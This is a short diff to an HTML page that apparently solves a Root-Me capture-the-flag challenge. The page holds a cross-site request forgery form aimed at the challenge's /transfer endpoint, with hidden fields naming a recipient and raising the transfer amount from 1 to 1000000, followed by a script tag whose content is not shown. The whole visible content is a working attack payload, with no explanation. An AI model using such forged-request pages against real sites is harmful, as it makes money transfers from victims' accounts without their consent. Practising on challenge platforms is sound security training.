--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
   <body>
     <form id="csrfForm" action="https://bankme-1.challenges.pro.root-me.org/transfer" method="POST">
       <input type="hidden" name="recipient" value="arai">
-      <input type="hidden" name="amount" value="1">
+      <input type="hidden" name="amount" value="1000000">
     </form>
 
     <script>
